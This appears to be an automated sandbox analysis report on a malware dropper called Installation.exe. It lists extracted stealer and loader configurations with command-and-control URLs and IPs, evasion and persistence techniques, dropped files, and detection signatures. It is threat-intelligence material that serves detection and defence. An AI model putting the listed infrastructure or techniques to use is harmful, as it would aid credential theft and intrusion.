glupteba | d31f2d2d991acee74d9be732c8180f37cea12aceaba324804fbcf2d0d2891a3d

Resubmissions

16-08-2021 10:04

210816-rzjv5cq83x 10

16-08-2021 09:49

210816-4hqgzd3pxx 10

Analysis

max time kernel
78s
max time network
172s
platform
windows10_x64
resource
win10v20210408
submitted
16-08-2021 09:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Installation.exe
Size

631KB
MD5

cbafd60beffb18c666ff85f1517a76f9
SHA1

9e015cba7168b610969bfc299a4ffe4763f4fd5f
SHA256

d31f2d2d991acee74d9be732c8180f37cea12aceaba324804fbcf2d0d2891a3d
SHA512

ba61ac5f49827b0fba2c72f4b19540b91f8bceb8b441a713b7de00317059955ad592c88af8f9c94093077503ab3b4c4c522b0e577599ca5020ad1b0f254066ce

Malware Config

Extracted

Family

vidar

Version

Botnet

937

https://lenak513.tumblr.com/

Attributes

profile_id
937

Extracted

Family

raccoon

Botnet

93d3ccba4a3cbd5e268873fc1760b2335272e198

Attributes

url4cnc
https://telete.in/opa4kiprivatem

rc4.plain

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

32222

188.124.36.242:25802

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

redline

Botnet

37.0.8.88:65442

Extracted

Family

redline

Botnet

ls3

ganedokhot.xyz:80

Extracted

Family

redline

Botnet

install2

65.21.103.71:56458

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4144-326-0x00000000015D0000-0x0000000001EF6000-memory.dmp	family_glupteba
behavioral2/memory/4144-333-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exerUNdlL32.eXerundll32.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5900	908	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4860	908	rUNdlL32.eXe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6324	908	rundll32.exe

Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 13 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3976-244-0x0000000002F10000-0x0000000002F2C000-memory.dmp	family_redline
C:\Users\Admin\Documents\bdEn9O4KywO22OwQREE86uvA.exe	family_redline
C:\Users\Admin\Documents\WyjfPqhY1m56uNFU3O157f9W.exe	family_redline
C:\Users\Admin\Documents\WyjfPqhY1m56uNFU3O157f9W.exe	family_redline
C:\Users\Admin\Documents\bdEn9O4KywO22OwQREE86uvA.exe	family_redline
behavioral2/memory/2056-283-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral2/memory/2056-289-0x0000000000418F82-mapping.dmp	family_redline
behavioral2/memory/4100-282-0x0000000000418F6A-mapping.dmp	family_redline
behavioral2/memory/3952-275-0x0000000000418F66-mapping.dmp	family_redline
behavioral2/memory/4100-276-0x0000000000400000-0x0000000000446000-memory.dmp	family_redline
behavioral2/memory/3952-273-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral2/memory/3976-256-0x0000000004B40000-0x0000000004B5A000-memory.dmp	family_redline
behavioral2/memory/5164-547-0x0000000000418F86-mapping.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

evasion 11 IoCs

evasion.

evasion

Processes:

resource	yara_rule
C:\Users\Admin\Documents\ewWpoQUM_MjaV3hD1P1xzDPI.exe	evasion
C:\Users\Admin\Documents\e3Fv6PFQskl6bjXrVlHOqUx_.exe	evasion
C:\Users\Admin\Documents\4oeFz3mEaXqXQKG4J9y10H2a.exe	evasion
C:\Users\Admin\Documents\e3Fv6PFQskl6bjXrVlHOqUx_.exe	evasion
C:\Users\Admin\Documents\e3Fv6PFQskl6bjXrVlHOqUx_.exe	evasion
behavioral2/memory/4144-326-0x00000000015D0000-0x0000000001EF6000-memory.dmp	evasion
behavioral2/memory/4144-333-0x0000000000400000-0x0000000000D41000-memory.dmp	evasion
C:\Users\Admin\Documents\ewWpoQUM_MjaV3hD1P1xzDPI.exe	evasion
C:\Users\Admin\Documents\4oeFz3mEaXqXQKG4J9y10H2a.exe	evasion
C:\Users\Admin\Documents\ewWpoQUM_MjaV3hD1P1xzDPI.exe	evasion
C:\Users\Admin\Documents\4oeFz3mEaXqXQKG4J9y10H2a.exe	evasion

suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata
suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)
suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/4132-222-0x0000000004A00000-0x0000000004A9D000-memory.dmp	family_vidar
behavioral2/memory/4132-236-0x0000000000400000-0x0000000002D15000-memory.dmp	family_vidar

Downloads MZ/PE file

Executes dropped EXE 27 IoCs

Processes:

S48IMD8lcg20hyY87j07u4Cs.exeeo6y0xbwwKcAuTsrneP6pHxG.exelTXLmvNBf0jFOlxVzf5b6h0M.exee3Fv6PFQskl6bjXrVlHOqUx_.exeSciumA1BXCk6M_nzLEyomFvu.exeLpjru175DWgoWMKocqFK7hyb.exegGG52pxF2TFO_Q_h8XETmDBc.exebdEn9O4KywO22OwQREE86uvA.exelqOYAxpB6w51BFdYBOd0Sg85.exeWyjfPqhY1m56uNFU3O157f9W.exeEUqOKCpxDpaD3rzZoEDUIwyy.exewo0EgEORYQVnTz_IQXwD4sCf.exe4oeFz3mEaXqXQKG4J9y10H2a.exeXSyzdtGnOb1hrK_pxtgF9AbN.exe5pOKhIT9xzpAqqlOFhGowWzI.exe6rcEO38NHZTK8OJiN8hG_cJq.exerFfsJNZOJHzkKLnTS_HALQcK.exeR7nQtc22iv7x6NzKf74TTP8I.exeJUwjTZwE7MJ3xBFHQPGTlDSL.exeewWpoQUM_MjaV3hD1P1xzDPI.exe_o9gi1GRhga6_puQJ7zRO6od.exeLxaY8x7rjUw_HhsZOQerw9D_.exeRQyeriXUzbRUpPrL7q0uoZxg.exeLxaY8x7rjUw_HhsZOQerw9D_.tmp4oeFz3mEaXqXQKG4J9y10H2a.exeewWpoQUM_MjaV3hD1P1xzDPI.exee3Fv6PFQskl6bjXrVlHOqUx_.exe

pid	process
996	S48IMD8lcg20hyY87j07u4Cs.exe
1548	eo6y0xbwwKcAuTsrneP6pHxG.exe
1532	lTXLmvNBf0jFOlxVzf5b6h0M.exe
3816	e3Fv6PFQskl6bjXrVlHOqUx_.exe
904	SciumA1BXCk6M_nzLEyomFvu.exe
1108	Lpjru175DWgoWMKocqFK7hyb.exe
1568	gGG52pxF2TFO_Q_h8XETmDBc.exe
4108	bdEn9O4KywO22OwQREE86uvA.exe
4144	lqOYAxpB6w51BFdYBOd0Sg85.exe
4116	WyjfPqhY1m56uNFU3O157f9W.exe
4132	EUqOKCpxDpaD3rzZoEDUIwyy.exe
3956	wo0EgEORYQVnTz_IQXwD4sCf.exe
3968	4oeFz3mEaXqXQKG4J9y10H2a.exe
3976	XSyzdtGnOb1hrK_pxtgF9AbN.exe
3824	5pOKhIT9xzpAqqlOFhGowWzI.exe
3036	6rcEO38NHZTK8OJiN8hG_cJq.exe
3180	rFfsJNZOJHzkKLnTS_HALQcK.exe
3844	R7nQtc22iv7x6NzKf74TTP8I.exe
2224	JUwjTZwE7MJ3xBFHQPGTlDSL.exe
3860	ewWpoQUM_MjaV3hD1P1xzDPI.exe
3868	_o9gi1GRhga6_puQJ7zRO6od.exe
4168	LxaY8x7rjUw_HhsZOQerw9D_.exe
4180	RQyeriXUzbRUpPrL7q0uoZxg.exe
4716	LxaY8x7rjUw_HhsZOQerw9D_.tmp
3952	4oeFz3mEaXqXQKG4J9y10H2a.exe
4100	ewWpoQUM_MjaV3hD1P1xzDPI.exe
2056	e3Fv6PFQskl6bjXrVlHOqUx_.exe

VMProtect packed file 2 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe	vmprotect
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe	vmprotect

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

bdEn9O4KywO22OwQREE86uvA.exeWyjfPqhY1m56uNFU3O157f9W.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	bdEn9O4KywO22OwQREE86uvA.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	bdEn9O4KywO22OwQREE86uvA.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	WyjfPqhY1m56uNFU3O157f9W.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	WyjfPqhY1m56uNFU3O157f9W.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Installation.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation	Installation.exe

Loads dropped DLL 3 IoCs

Processes:

RQyeriXUzbRUpPrL7q0uoZxg.exeLxaY8x7rjUw_HhsZOQerw9D_.tmp

pid process

4180 RQyeriXUzbRUpPrL7q0uoZxg.exe
4716 LxaY8x7rjUw_HhsZOQerw9D_.tmp
4716 LxaY8x7rjUw_HhsZOQerw9D_.tmp

pid	process
4180	RQyeriXUzbRUpPrL7q0uoZxg.exe
4716	LxaY8x7rjUw_HhsZOQerw9D_.tmp
4716	LxaY8x7rjUw_HhsZOQerw9D_.tmp

Themida packer 6 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/4116-235-0x0000000000F70000-0x0000000000F71000-memory.dmp	themida
C:\Users\Admin\Documents\bdEn9O4KywO22OwQREE86uvA.exe	themida
C:\Users\Admin\Documents\WyjfPqhY1m56uNFU3O157f9W.exe	themida
C:\Users\Admin\Documents\WyjfPqhY1m56uNFU3O157f9W.exe	themida
C:\Users\Admin\Documents\bdEn9O4KywO22OwQREE86uvA.exe	themida
behavioral2/memory/4108-247-0x0000000000CF0000-0x0000000000CF1000-memory.dmp	themida

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

WyjfPqhY1m56uNFU3O157f9W.exebdEn9O4KywO22OwQREE86uvA.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	WyjfPqhY1m56uNFU3O157f9W.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	bdEn9O4KywO22OwQREE86uvA.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

22 ipinfo.io
23 ipinfo.io
123 ipinfo.io
125 ip-api.com
126 ipinfo.io
235 ip-api.com
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

bdEn9O4KywO22OwQREE86uvA.exeWyjfPqhY1m56uNFU3O157f9W.exe

pid process

4108 bdEn9O4KywO22OwQREE86uvA.exe
4116 WyjfPqhY1m56uNFU3O157f9W.exe

flow	ioc
22	ipinfo.io
23	ipinfo.io
123	ipinfo.io
125	ip-api.com
126	ipinfo.io
235	ip-api.com

pid	process
4108	bdEn9O4KywO22OwQREE86uvA.exe
4116	WyjfPqhY1m56uNFU3O157f9W.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

4oeFz3mEaXqXQKG4J9y10H2a.exeewWpoQUM_MjaV3hD1P1xzDPI.exee3Fv6PFQskl6bjXrVlHOqUx_.exe

description	pid	process	target process
PID 3968 set thread context of 3952	3968	4oeFz3mEaXqXQKG4J9y10H2a.exe	4oeFz3mEaXqXQKG4J9y10H2a.exe
PID 3860 set thread context of 4100	3860	ewWpoQUM_MjaV3hD1P1xzDPI.exe	ewWpoQUM_MjaV3hD1P1xzDPI.exe
PID 3816 set thread context of 2056	3816	e3Fv6PFQskl6bjXrVlHOqUx_.exe	e3Fv6PFQskl6bjXrVlHOqUx_.exe

Drops file in Program Files directory 64 IoCs

Processes:

RQyeriXUzbRUpPrL7q0uoZxg.exeSciumA1BXCk6M_nzLEyomFvu.exe

description	ioc	process
File created	C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libtaglib_plugin.dll	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc-48.png	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm.xml	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\sd\jamendo.luac	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpgv_plugin.dll	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\libvlc.dll	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\buttons.png	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libattachment_plugin.dll	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libhttp_plugin.dll	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_hotkeys_plugin.dll	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libfolder_plugin.dll	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\librawvid_plugin.dll	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\lighteningplayer.ico	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\Video-48.png	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_msg_plugin.dll	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemuxdump_plugin.dll	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libes_plugin.dll	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libgme_plugin.dll	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libmod_plugin.dll	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libreal_plugin.dll	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\view.html	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\README.txt	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\modules\simplexml.luac	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libvoc_plugin.dll	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libwav_plugin.dll	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\main.css	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\js\jquery.jstree.js	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\cli.luac	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\twitch.luac	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libhttps_plugin.dll	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libsubtitle_plugin.dll	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\mobile_view.html	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\offset_window.html	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_wasapi_plugin.dll	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\logger\libfile_logger_plugin.dll	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\librawaud_plugin.dll	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\mosaic_window.html	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\Back-48.png	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\meta\art\02_frenchtv.luac	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libcdda_plugin.dll	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libamem_plugin.dll	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libimage_plugin.dll	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm_cmd.xml	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\anevia_xml.luac	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libimem_plugin.dll	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\lua\liblua_plugin.dll	RQyeriXUzbRUpPrL7q0uoZxg.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\customer3.exe	SciumA1BXCk6M_nzLEyomFvu.exe
File created	C:\Program Files (x86)\lighteningplayer\regstr	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\error_window.html	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libtimecode_plugin.dll	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libudp_plugin.dll	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libps_plugin.dll	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\liboldrc_plugin.dll	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\speaker-32.png	RQyeriXUzbRUpPrL7q0uoZxg.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\dummy.luac	RQyeriXUzbRUpPrL7q0uoZxg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 19 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4620	1568	WerFault.exe	gGG52pxF2TFO_Q_h8XETmDBc.exe
3344	1568	WerFault.exe	gGG52pxF2TFO_Q_h8XETmDBc.exe
4656	1568	WerFault.exe	gGG52pxF2TFO_Q_h8XETmDBc.exe
4592	1568	WerFault.exe	gGG52pxF2TFO_Q_h8XETmDBc.exe
852	4132	WerFault.exe	EUqOKCpxDpaD3rzZoEDUIwyy.exe
4368	1568	WerFault.exe	gGG52pxF2TFO_Q_h8XETmDBc.exe
4260	4132	WerFault.exe	EUqOKCpxDpaD3rzZoEDUIwyy.exe
4520	4132	WerFault.exe	EUqOKCpxDpaD3rzZoEDUIwyy.exe
4828	4132	WerFault.exe	EUqOKCpxDpaD3rzZoEDUIwyy.exe
4440	4132	WerFault.exe	EUqOKCpxDpaD3rzZoEDUIwyy.exe
4732	4132	WerFault.exe	EUqOKCpxDpaD3rzZoEDUIwyy.exe
2880	4132	WerFault.exe	EUqOKCpxDpaD3rzZoEDUIwyy.exe
4564	4132	WerFault.exe	EUqOKCpxDpaD3rzZoEDUIwyy.exe
4860	4132	WerFault.exe	EUqOKCpxDpaD3rzZoEDUIwyy.exe
4764	4132	WerFault.exe	EUqOKCpxDpaD3rzZoEDUIwyy.exe
2172	4132	WerFault.exe	EUqOKCpxDpaD3rzZoEDUIwyy.exe
5048	4132	WerFault.exe	EUqOKCpxDpaD3rzZoEDUIwyy.exe
5672	3956	WerFault.exe	wo0EgEORYQVnTz_IQXwD4sCf.exe
7116	6592	WerFault.exe	ufgaa.exe

NSIS installer 2 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\Documents\RQyeriXUzbRUpPrL7q0uoZxg.exe	nsis_installer_2
C:\Users\Admin\Documents\RQyeriXUzbRUpPrL7q0uoZxg.exe	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

lTXLmvNBf0jFOlxVzf5b6h0M.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	lTXLmvNBf0jFOlxVzf5b6h0M.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	lTXLmvNBf0jFOlxVzf5b6h0M.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	lTXLmvNBf0jFOlxVzf5b6h0M.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

7012 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

6988 timeout.exe
Download via BitsAdmin 1 TTPs 1 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exe

pid process

5668 bitsadmin.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

6924 taskkill.exe

pid	process
7012	schtasks.exe

pid	process
6988	timeout.exe

pid	process
5668	bitsadmin.exe

pid	process
6924	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

Installation.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Installation.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded